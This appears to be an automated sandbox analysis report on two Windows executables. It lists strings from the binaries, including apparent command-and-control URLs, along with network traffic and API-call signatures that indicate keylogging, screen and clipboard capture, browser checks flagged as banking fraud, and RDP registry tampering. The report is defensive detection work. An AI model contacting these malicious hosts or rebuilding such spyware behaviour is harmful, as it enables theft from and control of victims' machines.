                Source: 33MwVPy.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: Rudvfa0Z17.exeString found in binary or memory: http://sdk.jumpw.com/sdk/AdPodxt
                Source: Rudvfa0Z17.exeString found in binary or memory: http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrg
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmp
                Source: Rudvfa0Z17.exe, 00000000.00000002.3259526333.000000000019D000.00000004.00000010.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmp
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmp#knR
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmp0
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmpi
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmps
                Source: Rudvfa0Z17.exe, 00000000.00000002.3259526333.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmpwininetShell32msvcrt
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/t.bmpmp
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260038071.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/text.bmp
                Source: Rudvfa0Z17.exe, 00000000.00000002.3260753176.0000000003109000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/text.bmpC:
                Source: libcef.dll.0.drString found in binary or memory: http://www.astro.com/swisseph.
                Source: 33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htm
                Source: Rudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htmMain
                Source: 33MwVPy.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: libcef.dll.0.drString found in binary or memory: http://www.gnu.org
                Source: Rudvfa0Z17.exeString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: Rudvfa0Z17.exeString found in binary or memory: http://www.openssl.org/support/faq.html....................
                Source: 33MwVPy.exe, 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleep
                Source: Rudvfa0Z17.exeString found in binary or memory: https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.json
                Source: Rudvfa0Z17.exeString found in binary or memory: https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.json
                Source: Rudvfa0Z17.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                Source: 33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.html
                Source: Rudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
                Source: Rudvfa0Z17.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3172/qr_code.do
                Source: Rudvfa0Z17.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_cod
                Source: Rudvfa0Z17.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3524/qr_code.do
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/U
                Source: 33MwVPy.exe, 00000006.00000002.3882755170.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000003.3856836689.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettask
                Source: 33MwVPy.exe, 00000006.00000003.3775415571.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000003.3556773695.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000003.3556860051.00000000013FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettask?
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettaskE
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettask_
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettasko
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/c
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/im
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/j
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/q
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/x
                Source: 33MwVPy.exe, 00000006.00000003.3556773695.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3882524922.0000000001377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com:443/api.php/common/gettask
                Source: Rudvfa0Z17.exeString found in binary or memory: https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.com
                Source: 33MwVPy.exe, 00000006.00000002.3881817015.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000007.00000002.3353002512.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000008.00000002.3435532254.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://support.ubi.com/
                Source: 33MwVPy.exe, 00000006.00000002.3881817015.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000007.00000002.3353002512.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, 33MwVPy.exe, 00000008.00000002.3435532254.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired
                Source: 33MwVPy.exe, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/
                Source: Rudvfa0Z17.exe, 00000000.00000003.3116399603.0000000010037000.00000004.00000020.00020000.00000000.sdmp, Rudvfa0Z17.exe, 00000000.00000003.3228816926.0000000003E40000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883747359.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000007.00000002.3354131149.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, 33MwVPy.exe, 00000008.00000002.3436577941.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/Timezone
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61390
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61391
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61392
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61393
                Source: unknownNetwork traffic detected: HTTP traffic on port 61392 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61391 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61393 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61390 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61384
                Source: unknownNetwork traffic detected: HTTP traffic on port 61384 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61385
                Source: unknownNetwork traffic detected: HTTP traffic on port 61387 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61385 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61386 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61386
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61387
                Source: unknownNetwork traffic detected: HTTP traffic on port 61388 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61388
                Source: unknownNetwork traffic detected: HTTP traffic on port 61389 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61389
                Source: unknownHTTPS traffic detected: 104.21.17.45:443 -> 192.168.2.5:61384 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61385 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61386 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61387 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61388 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61389 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61390 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61391 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61392 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.6.127:443 -> 192.168.2.5:61393 version: TLS 1.2
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2D1BA1 GetDeviceCaps,LoadCursorA,SetCursor,_memset,SelectObject,BeginPaint,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SetWindowOrgEx,SetWindowExtEx,SetBkMode,CreateFontA,SelectObject,_sprintf,DeleteObject,SelectObject,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,EndPaint,SetCursor,PostMessageA,_lopen,_llseek,GlobalAlloc,GlobalLock,GlobalLock,_llseek,_hread,_lclose,_sprintf,_sprintf,GlobalUnlock,GlobalUnlock,OpenClipboard,EmptyClipboard,RegisterClipboardFormatA,GlobalLock,SetMetaFileBitsEx,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_6C2D1BA1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E024 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,6_2_0331E024
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03317DE6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_03317DE6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_1002C000 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,6_2_1002C000
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_10025B70 SetEvent,GetSystemMetrics,BlockInput,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,GlobalSize,GlobalUnWire,CloseClipboard,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_10025B70
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331E024 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,6_2_0331E024
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03320B04 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetTopWindow,GetWindow,GetWindow,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,6_2_03320B04
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331AA54 Sleep,CreateMutexA,GetLastError,CloseHandle,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,Sleep,GetForegroundWindow,GetWindowTextA,lstrlen,GetLocalTime,wsprintfA,GetAsyncKeyState,lstrcat,Sleep,ReleaseMutex,6_2_0331AA54

                E-Banking Fraud

                barindex
                Checks if browser processes are running
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: SHGetFolderPathA,lstrcpy,CreateFileA,GetFileSize,ReadFile,_strstr,_strstr,_strstr,lstrcpy,lstrcpy,lstrcpy,CreateProcessA,CloseHandle, firefox.exe6_2_0331F744
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: SHGetFolderPathA,lstrcpy,CreateFileA,GetFileSize,ReadFile,_strstr,_strstr,_strstr,lstrcpy,lstrcpy,lstrcpy,CreateProcessA,CloseHandle, firefox.exe6_2_1002D720

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,6_2_6C2E8C7D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 7_2_6C2E8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,7_2_6C2E8C7D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_03321124 OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,CloseHandle,6_2_03321124

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 6.2.33MwVPy.exe.3258c24.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 6.2.33MwVPy.exe.32f2c24.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 6.2.33MwVPy.exe.3258c24.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 6.2.33MwVPy.exe.32f2c24.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Drops password protected ZIP file
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0331C236 LocalAlloc,OpenSCManagerA,OpenServiceA,GetLastError,QueryServiceStatus,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,6_2_0331C236
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_0330A1F4 ExitWindowsEx,6_2_0330A1F4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_100181D0 ExitWindowsEx,6_2_100181D0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_004230A00_2_004230A0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_006699170_2_00669917
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_0040FBE00_2_0040FBE0
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_0040FCFC0_2_0040FCFC
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_0040F5500_2_0040F550
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00641D870_2_00641D87
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_004066200_2_00406620
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00669EF40_2_00669EF4
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D00310_2_026D0031
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026E52640_2_026E5264
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026DC1440_2_026DC144
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D76800_2_026D7680
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026E57B50_2_026E57B5
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026D6CE50_2_026D6CE5
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026E4D130_2_026E4D13
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_026E6DF60_2_026E6DF6
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_10008BDA0_2_10008BDA
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_1000C1400_2_1000C140
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100152600_2_10015260
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_10006CE10_2_10006CE1
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100064E10_2_100064E1
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_10014D0F0_2_10014D0F
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_10016DF20_2_10016DF2
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_1000767C0_2_1000767C
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_100157B10_2_100157B1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2B58356_2_6C2B5835
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2711126_2_6C271112
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C311CD16_2_6C311CD1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F9CC56_2_6C2F9CC5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C279CCA6_2_6C279CCA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C28CD326_2_6C28CD32
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C301D126_2_6C301D12
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2D9D7B6_2_6C2D9D7B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2EBD486_2_6C2EBD48
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C306D466_2_6C306D46
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2CDD8F6_2_6C2CDD8F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2CEDF56_2_6C2CEDF5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2BBDD06_2_6C2BBDD0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E9E126_2_6C2E9E12
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C278E606_2_6C278E60
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C318E6E6_2_6C318E6E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E3E4C6_2_6C2E3E4C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C28AED76_2_6C28AED7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C307F376_2_6C307F37
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C28DF3F6_2_6C28DF3F
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C28BFD76_2_6C28BFD7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C28387C6_2_6C28387C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3119336_2_6C311933
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3129706_2_6C312970
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2969736_2_6C296973
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F59906_2_6C2F5990
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F99C66_2_6C2F99C6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2B09DA6_2_6C2B09DA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2FCAA56_2_6C2FCAA5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C287BAA6_2_6C287BAA
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C285BBD6_2_6C285BBD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C27EBF46_2_6C27EBF4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E0BCC6_2_6C2E0BCC
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3114226_2_6C311422
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C27B41A6_2_6C27B41A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C31149E6_2_6C31149E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C31248B6_2_6C31248B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C30B5036_2_6C30B503
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2845446_2_6C284544
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2A05B36_2_6C2A05B3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2BB5D76_2_6C2BB5D7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E86B76_2_6C2E86B7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2B86896_2_6C2B8689
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2856986_2_6C285698
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E46986_2_6C2E4698
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2EF6C96_2_6C2EF6C9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2BD7686_2_6C2BD768
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F974B6_2_6C2F974B
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3067F56_2_6C3067F5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E20256_2_6C2E2025
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2E70036_2_6C2E7003
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2DB07C6_2_6C2DB07C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3120A36_2_6C3120A3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C29E0D86_2_6C29E0D8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2CA1926_2_6C2CA192
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C27E1C86_2_6C27E1C8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2F026A6_2_6C2F026A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2D32666_2_6C2D3266
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2782796_2_6C278279
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C3062A66_2_6C3062A6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_6C2882B26_2_6C2882B2
